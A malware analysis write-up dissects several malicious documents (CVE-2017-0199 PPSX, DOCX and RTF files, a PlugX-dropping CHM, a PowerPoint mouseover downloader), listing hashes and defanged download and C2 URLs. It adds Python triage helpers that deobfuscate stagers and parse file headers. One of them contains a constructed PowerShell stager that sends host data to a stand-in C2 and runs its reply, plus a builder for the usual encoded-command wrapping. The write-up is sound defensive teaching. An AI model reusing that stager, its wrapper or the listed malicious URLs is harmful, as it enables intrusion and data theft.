[ Sharing ] Analysing simple tricks used in malicious documents

Today I'll go through how to analyse some of the simple tricks used in malicious documents.

The first example is a .ppsx file that exploits CVE-2017-0199 via the "PPSX Script Moniker" bug.
SHA256 : d4b345ed6b83fe477f3b30a4f4d124284fb73c38ec918d71284f6abf48982c23
ITW filename : 0Baptist U China1.ppsx
First Submission : 2017-08-10 16:44:45
Last Submission : 2017-08-10 16:44:45


Description:
============

The sample tries to execute the following scriptlet: script:hxxp://104.243.34.82/jf93jf8yu98yretghw43k4i2i3i4.sct
You might ask, "But how do we normal users know that?"
Load the file in Profiler and select "ppt/slides/_rels/slide1.xml.rels": the relationship entry for the slide points at that script: target, as shown in the following image.

So now let’s inspect the contents of jf93jf8yu98yretghw43k4i2i3i4.sct

Contents of jf93jf8yu98yretghw43k4i2i3i4.sct:
=============================================

Now let's decode the base64-encoded string and see what the PowerShell inside jf93jf8yu98yretghw43k4i2i3i4.sct is trying to execute.

Base64 Decoded String:
======================

After decoding and decompressing, the string looks like the following:

Base64 decoded and decompressed String:
=======================================

As the code snippet shows, it collects data about the victim's machine, sends it to hxxp://104.243.34.82:8080, and then fetches instructions from the same address.
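The "decode the base64, then decompress" step above is the standard way to peel a compressed PowerShell stager, so here is an added example (not the author's code and not the real .sct content) that does it in Python. It builds a stand-in stager with the usual layering (gzip, base64, a GzipStream loader, UTF-16LE, base64 as -EncodedCommand) and then unwraps it layer by layer; the C2 address 203.0.113.10:8080 and the script text are constructed.

```python
import base64
import gzip
import re
import zlib

# Constructed stand-in for the decoded, decompressed stager (NOT the real
# jf93jf8yu98yretghw43k4i2i3i4.sct content): posts host info to a C2 and then
# runs whatever the C2 returns, the behaviour described in the text.
INNER_SCRIPT = ("$u='http://203.0.113.10:8080/';$w=New-Object Net.WebClient;"
                "$w.UploadString($u,$env:COMPUTERNAME);IEX $w.DownloadString($u)")


def build_encoded_command(script: str) -> str:
    """Wrap a script the way a compressed stager does, so there is something to unwrap:
    gzip -> base64 -> GzipStream loader -> UTF-16LE -> base64 (-EncodedCommand)."""
    inner = base64.b64encode(gzip.compress(script.encode())).decode()
    loader = ("$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + inner + "'));"
              "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
              "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()")
    return base64.b64encode(loader.encode("utf-16-le")).decode()


# A base64 run long enough to be a payload rather than an identifier.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _maybe_decompress(data: bytes) -> bytes:
    """Undo GzipStream output (1f 8b magic) or header-less DeflateStream output; pass anything else through."""
    if data[:2] == b"\x1f\x8b":
        return gzip.decompress(data)
    try:
        return zlib.decompress(data, -15)      # -15: raw DEFLATE, no zlib header
    except zlib.error:
        return data


def _decode_layer(data: bytes) -> str:
    """-EncodedCommand payloads are UTF-16LE, so an ASCII script has a NUL in every odd byte;
    anything else is treated as (possibly compressed) UTF-8 script text."""
    if len(data) >= 2 and data[1:2] == b"\x00":
        return data.decode("utf-16-le", "replace")
    return _maybe_decompress(data).decode("utf-8", "replace")


def unwrap_powershell(encoded: str, max_layers: int = 5) -> list:
    """Peel base64/compression layers, taking the longest base64 run each time.
    Returns every decoded layer, outermost first, so the last entry is the real script."""
    layers = []
    current = encoded
    for _ in range(max_layers):
        runs = B64_RUN.findall(current)
        if not runs:
            break
        try:
            data = base64.b64decode(max(runs, key=len))
        except ValueError:
            break
        text = _decode_layer(data)
        layers.append(text)
        current = text
    return layers


if __name__ == "__main__":
    for depth, layer in enumerate(unwrap_powershell(build_encoded_command(INNER_SCRIPT)), 1):
        print("layer %d: %s" % (depth, layer[:120]))
```

The innermost layer is where the C2 address and the "send host info, then execute the response" logic live; anything that still contains a long base64 run after the last layer is a sign the stager has one more wrapper than the loop allows, in which case raise max_layers rather than trusting the partial result.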

If we execute the following curl command against that address:

We can see that it's trying to run a "dir" command on the victim's machine and send the output back.

Ok let’s move on to another sample.
The next example is a .chm file. I decided to look at CHM after reading a Device Guard UMCI bypass using CHM today, https://msitpros.com/?p=3909.
I won't go through how the bypass works, as that blog post is detailed enough. I'll focus on an old example that was distributing PlugX.
There is a much more comprehensive article on CHM analysis at https://tuts4you.com/download.php?view.2796
SHA256 : 7f4062a38dc5d40eec0ddfd8be6e60c01567f70dfa6ec065cb8ddf996251f369
ITW filename : My Document22s.chm
First Submission : 2017-08-10 07:59:50
Last Submission : 2017-08-10 07:59:50


Description:
============

Let's load it with Profiler and do some basic DFIR.

We can see that the DWORD at offset 0x0014 is 0x00000804.
With reference to http://chmspec.nongnu.org/latest/, this is the Windows language ID
(the user's default LCID, from GetUserDefaultLCID) of the operating system the file was compiled on.
0x0804 is Chinese (Simplified), so the help file was compiled on a zh-CN system.

The DWORD at offset 0x0010 is 0x4020AE9E.
Read as Unix epoch seconds, that is GMT: Wednesday, February 4, 2004 8:34:38 AM.
One caveat: http://chmspec.nongnu.org/latest/ describes this field as a timestamp derived from
GetFileTime(), the dwLowDateTime member of the last-write FILETIME. The low 32 bits of a FILETIME
(a 100 ns count since 1601) wrap every 429 seconds and cannot be turned into a date on their own,
so the 2004 reading only holds if the compiler actually wrote epoch seconds here. Either way the
value comes from the attacker's build machine, so treat it as a weak indicator, not evidence.
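As an added example (my code, not the author's), a small Python parser for the ITSF header fields discussed above. It runs over constructed header bytes that carry the same two values (0x4020AE9E and 0x0804); these are not bytes from the My Document22s.chm sample, and the LCID table is an assumed minimal subset.

```python
import struct
from datetime import datetime, timezone

# Constructed ITSF header: magic, version 3, declared header length, the unknown DWORD,
# the timestamp and the language ID from the analysis above. Not bytes from the sample.
SAMPLE_HEADER = struct.pack("<4sIIIII", b"ITSF", 3, 0x60, 1, 0x4020AE9E, 0x0804)

# Assumption: only the LCIDs listed here resolve to a name; extend as needed.
LANG_IDS = {
    0x0409: "English (United States)",
    0x0804: "Chinese (Simplified, PRC)",
    0x0411: "Japanese",
    0x0412: "Korean",
    0x0419: "Russian",
}


def parse_itsf_header(data: bytes) -> dict:
    """Decode the first 0x18 bytes of a CHM (ITSF) header into the fields used for triage."""
    if len(data) < 0x18:
        raise ValueError("too short for an ITSF header")
    magic, version, hdr_len, _unknown, timestamp, lang = struct.unpack_from("<4sIIIII", data, 0)
    if magic != b"ITSF":
        raise ValueError("not a CHM: ITSF magic missing")
    return {
        "version": version,
        "header_length": hdr_len,
        "timestamp_raw": timestamp,
        # Interpreting the DWORD as Unix epoch seconds reproduces the date given in the text;
        # if the field really is the low half of a FILETIME this value is meaningless.
        "timestamp_as_epoch": datetime.fromtimestamp(timestamp, tz=timezone.utc)
                                      .strftime("%Y-%m-%d %H:%M:%S UTC"),
        "language_id": lang,
        "language": LANG_IDS.get(lang, "unknown LCID 0x%04x" % lang),
    }


if __name__ == "__main__":
    for key, value in parse_itsf_header(SAMPLE_HEADER).items():
        print("%-18s %s" % (key, value))
```

To run it on a real file, pass `open(path, "rb").read(0x18)` instead of `SAMPLE_HEADER`; the magic check will reject anything that is not a CHM.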

Now let's extract the CHM contents. A CHM is not a zip but an ITSS container with LZX compression; 7-Zip or "hh.exe -decompile <output folder> <file.chm>" unpacks it the same way you would an archive.
Load the extracted folder in Profiler again and we can see the following image.

We can see that there are three HTML files. The first one shown to victims is main.html, and in it we find this interesting code snippet.

This is fairly trivial to deobfuscate, so I won't go through it; http://dean.edwards.name/unpacker/ does it for you.
We get back the following code snippet.

Hmm... the JavaScript still looks messy. We can either decode it again by hand or run it through http://jsnice.org/.
We should get back the following:

A quick glance shows that it's trying to execute the code in 1.htm.
So let's move over and take a look at 1.htm.

As the code snippet below shows, it base64-decodes an encoded string and executes the result.
It also tries to base64-decode something called "bin.base64", which we can't find here; we'll get back to that. We can also see that the dropped payload is named "MsMpEng.exe", the name of the Windows Defender service binary, a classic masquerade ^^

After base64 decoding, we get back the following. It is trying to execute xml.htm, so let's look at that now.

Checking out xml.htm, we can spot the "bin.base64" referenced from 1.htm. So what is in the base64-encoded blob?

Once we base64-decode it, we get back the payload shown here.
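Both 1.htm (a base64 string that decodes to a loader) and xml.htm (a bin.base64 node that decodes to the executable) come down to the same triage step: find every long base64 run in the extracted HTML, decode it, and decide whether it is script text or a PE. This added example (mine, not the author's or the sample's code) does that over a constructed HTML page modelled on those two files; the loader string, the 128-byte fake PE and the data-island layout are all constructed.

```python
import base64
import hashlib
import re
import string

# Base64 runs of 100+ chars, allowing the line wrapping MSXML data islands use
# (but not spaces, so ordinary prose in the page does not match).
B64_RUN = re.compile(r"[A-Za-z0-9+/\r\n]{100,}={0,2}")
PRINTABLE = set(string.printable.encode("ascii"))


def _fake_pe() -> bytes:
    """Constructed 128-byte stand-in for a PE: MZ header whose e_lfanew points at 'PE\\0\\0'. Not real code."""
    header = bytearray(b"MZ" + b"\x00" * 0x3e)
    header[0x3c:0x40] = (0x40).to_bytes(4, "little")
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 60


def _wrap(b64: str, width: int = 76) -> str:
    return "\n".join(b64[i:i + width] for i in range(0, len(b64), width))


# Constructed HTML modelled on the two files discussed above (not the sample's content):
# a 1.htm-style script that decodes and evals a base64 string, and an xml.htm-style
# data island whose bin.base64 node carries the executable.
LOADER_JS = "location.href='xml.htm'; /* constructed stand-in for the decoded loader string */"
SAMPLE_HTML = """<html><body>
<script>eval(b64d("%s"));</script>
<xml id="x"><root xmlns:dt="urn:schemas-microsoft-com:datatypes">
<file dt:dt="bin.base64">
%s
</file></root></xml>
</body></html>""" % (base64.b64encode(LOADER_JS.encode()).decode(),
                    _wrap(base64.b64encode(_fake_pe()).decode()))


def _is_pe(data: bytes) -> bool:
    """MZ at offset 0 and 'PE\\0\\0' at e_lfanew (offset 0x3c), which is what a dropped .exe must have."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3c:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def _is_text(data: bytes) -> bool:
    return bool(data) and sum(b in PRINTABLE for b in data) / len(data) > 0.95


def carve_base64(html: str) -> list:
    """Find, decode and classify embedded base64 blobs; one dict per blob, in page order."""
    found = []
    for m in B64_RUN.finditer(html):
        compact = re.sub(r"\s+", "", m.group(0))
        if len(compact) % 4:
            continue                      # partial run: skip rather than mis-decode
        try:
            data = base64.b64decode(compact, validate=True)
        except ValueError:
            continue
        kind = "pe" if _is_pe(data) else "text" if _is_text(data) else "binary"
        found.append({
            "offset": m.start(),
            "kind": kind,
            "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest(),
            "preview": data[:60].decode("ascii", "replace") if kind == "text" else "",
        })
    return found


if __name__ == "__main__":
    for blob in carve_base64(SAMPLE_HTML):
        print("%(offset)6d %(kind)-6s %(size)6d %(sha256)s %(preview)s" % blob)
```

Run it over each extracted .htm in turn (`carve_base64(open(path, encoding="utf-8", errors="replace").read())`); a "pe" hit gives you the dropped file's SHA256 straight away, and a "text" hit whose preview references another page tells you where the chain goes next, which is exactly the 1.htm to xml.htm hop above.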

The dropped payload is PlugX, and there are many articles on it, so I won't go into the details here either.
You can read up on PlugX here:
http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html
https://www.lastline.com/labsblog/an-analysis-of-plugx-malware/

The details of the dropped payload are as follows.
SHA256 : 6a60e950f06a3d9b0eaac81d69a3a6da9e04eff5db9f094ad0a06f7bc983092d
ITW filename : MsMpEng.exe
First Submission : 2014-06-13 07:14:21
Last Submission : 2015-03-12 10:00:17

Ok let’s move on to another sample.
The next example is a .docx file using CVE-2017-0199.
SHA256 : db20e146714121fa02d24a7de2ee0132052e0202856396c95e191453badf7239
ITW filename : Payment_Advice.docx
First Submission : 2014-06-13 06:18:04
Last Submission : 2017-07-04 09:44:54


Description:
============

Loading this file in Profiler shows the following image.

As we can see here:

there is an externally linked OLE object located at hxxps://a[.]pomf[.]cat/xhiuyr[.]doc

So let’s download this file.
SHA256 : 659CD31DAB50248F741C822C2641B65B5314DB043BFADDE32CD9051AF3FC5FE4
ITW filename : xhiuyr[.]doc

This file is not on VirusTotal yet.
Never mind; loading it in Profiler shows that it tries to download and execute a binary from hxxps://a[.]pomf[.]cat/kzwhhg[.]exe

Let's go through another .docx file using CVE-2017-0199.
SHA256 : f0f6a33e779ebc2ee9553cf413fc93d4236aefb970fd4a4435b45957f0799d9a
ITW filename : BL_INV#086395_PL.docx
First Submission : 2017-08-09 10:50:30
Last Submission : 2017-08-09 10:50:30


Description:
============

Loading this file in Profiler shows the following image.

As we can see here:

there is an externally linked OLE object located at hxxp://uploads[.]shanatan[.]moe/yytvit[.]doc

So let’s download that as well.
SHA256 : 98ccf03a2fea4984ffe71acd2326e1f7533db78e4f487149daf08ea0935c1534
ITW filename : yytvit.doc
First Submission : 2017-08-03 12:46:47
Last Submission : 2017-08-09 03:11:53

Loading it in Profiler shows that this is another CVE-2017-0199 file.

This time it downloads hxxps://i[.]memenet[.]org/wfedgl[.]hta
Fetching wfedgl[.]hta with curl shows that it contains JavaScript.

URL-decoding the string gives us the following.
It launches PowerShell to download the malicious binary from hxxp://uploads[.]shanatan[.]moe/wzglvz[.]exe

The next example is an RTF CVE-2017-0199 exploit (note the .doc extension; Word opens RTF regardless of the extension, so the filename tells you nothing about the format).
SHA256 : 5e226dbb90541a61203eeb4baef01326aa67a7e9461d1efec0d786c39781aeb7
ITW filename : CN-17069 REQUIRED.doc
First Submission : 2017-08-14 02:47:32
Last Submission : 2017-08-14 05:36:46


Description:
============

Loading it in Profiler, we can see that the sample contains an OLE object, as shown here:

However, we can't find any URL like in the other CVE-2017-0199 samples. So let's open the RTF in Notepad++ and look at it directly.

Immediately one string caught my eye: {\*\b 0{\*\pxe b}
According to the RTF 1.5 specification (http://www.biblioscape.com/rtf15_spec.htm),

\b turns bold on, whereas \b0 turns it off.

Neither is meaningful inside object data. The \* prefix tells an RTF reader to silently discard any destination it does not understand, so Word skips the group and carries on, while a parser that expects an uninterrupted hex stream stops at the first brace and never sees the rest of the object.
So let's just remove {\*\b 0{\*\pxe b} and load the file in Profiler again to see whether that helps.
This time a URL is visible, "HtTP:\\193[.]29[.]187[.]49\qb.doc", as shown below. Note the mixed-case scheme and the backslashes: Windows URL parsing tolerates both, so a URL regex that only looks for lowercase "http://" misses this.

Now let's download the other "doc" file.

Inspecting qb.doc in Notepad++, we find this interesting code snippet:

It's not difficult to understand:

it downloads tartakpiotrkow[.]com/.cache/en/emma.exe. So let's download that too.

The downloaded emma.exe is LokiBot. There is a detailed SANS paper on LokiBot, which you can read here:
https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850

The hashes of the two files are as follows:
Filename : qb.doc
SHA256 : 31a5b4331429bd6e406c5fb00e814ddafd69b73c71f63c64559e1ee5a1260b94
Filename : emma.exe
SHA256 : ba5271c01380cc148b608a1d0cbed39ef2882bcbf304029ea96d672ff223f73e

The next example is a .pptx file that abuses PowerPoint's mouseover action.
SHA256 : b26da51a70618b68a479e21bce499c20d4b280d7c79aa6b054da82c747ccfba1
ITW filename : sample.pptx
First Submission : 2017-08-07 11:05:38
Last Submission : 2017-08-07 11:05:38


Description:
============

Loading it in Profiler, we can see that the sample abuses PowerPoint's mouseover action to launch a command.
This is done with the ppaction://program action: hovering over the element fires its hyperlink, and the "hyperlink" target is a command line rather than a URL, which PowerPoint hands to the shell.

We can see the following in "ppt/slides/_rels/slide1.xml.rels":

It downloads hxxp://youthservicesballarat[.]com[.]au/images/kubrickhead[.]jpg and runs it with msiexec; Windows Installer accepts a URL as the package argument, so the "jpg" is fetched and installed in one step.

SHA256 : fabcee5f4bab02700375db8a6b1e6a04372f19a4af98d2652ddcc15915374e02
ITW filename : kubrickhead.jpg
First Submission : 2017-08-07 04:30:43
Last Submission : 2017-08-07 04:30:43

Inspecting it in Profiler, we can see that this is not a JPEG at all but an MSI installer (it starts with the OLE compound file magic D0 CF 11 E0 rather than the FF D8 of a JPEG).

Within the MSI there is a .NET malware.
I shall leave the reversing of that malware as an exercise for the reader.

Thanks & Regards
Jacob Soo